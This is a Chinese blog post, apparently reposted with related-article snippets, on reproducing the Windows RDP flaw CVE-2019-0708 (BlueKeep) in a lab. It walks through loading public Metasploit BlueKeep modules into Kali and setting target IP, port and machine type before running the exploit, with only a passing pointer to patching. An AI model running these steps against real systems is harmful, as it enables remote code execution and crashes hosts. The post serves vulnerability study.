CVE 2019 0708漏洞復現防禦修復

2022-01-12 10:36:53 字數 2235 閱讀 4033

windows再次被曝出乙個破壞力巨大的高危遠端漏洞cve-2019-0708。攻擊者一旦成功利用該漏洞,便可以在目標系統上執行任意**,包括獲取敏感資訊、執行遠端**、發起拒絕服務攻擊等等攻擊行為。而更加嚴重的是,這個漏洞的觸發無需使用者互動,攻擊者可以用該漏洞製作堪比2023年席捲全球的wannacry類蠕蟲病毒,從而進行大規模傳播和破壞。

首先更新我們的kaili

apt-get  install metasploit-framework
更新完成後

開啟msfconsole 並未有利用程式只有檢測工具

依次執行命令建立利用資料夾

mkdir -p /usr/share/metasploit-framework/modules/exploit/windows/rdp/mkdir  -p /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/mkdir  -p /usr/share/metasploit-framework/modules/exploits/windows/rdp/cp rdp.rb   /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb

cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

重新開啟msfconsole

我們匯入

這個exp 目前只有 windwos 7  /2008r2  而且是社群閹割版容易藍屏

set rhosts 設定ip

set rport 設定rdp埠號

使用set target id設定受害機機器

使用exploit開始攻擊,等待建立連線

當然也可以選其他的

show targets

直接run 

之前復現過一次在復現就一執行就藍屏 放一張朋友成功的

而我的

前往這個位址進行漏洞修復

CVE 2019 0708漏洞復現

系統 iplinux 192.168.1.56 win7 192.168.1.57 然後開啟win7的3389遠端連線服務 可以已經開放了3389遠端服務,驗證是否存在0708漏洞 驗證漏洞模組 auxiliary scanner rdp cve 2019 0708 bluekeep 驗證完畢後直接...

漏洞復現 CVE 2019 0708 漏洞利用

2019年5月14日微軟官方發布安全補丁,修復了windows遠端桌面服務的遠端 執行漏洞,該漏洞影響了某些舊版本的windows系統。此漏洞是預身份驗證且無需使用者互動,這就意味著這個漏洞可以通過網路蠕蟲的方式被利用。利用此漏洞的任何惡意軟體都可能從被感染的計算機傳播到其他易受攻擊的計算機,其方式...

CVE 2019 0708漏洞利用

漏洞平台披露 利用3389埠的rdp進行漏洞利用 影響系統 windows 7 windows2003 windows2008 windowsxp 等等,具體影響範圍看上面的鏈結 即可 漏洞利用 攻擊方 192.168.216.139 kali linux 靶機 192.168.216.138 wi...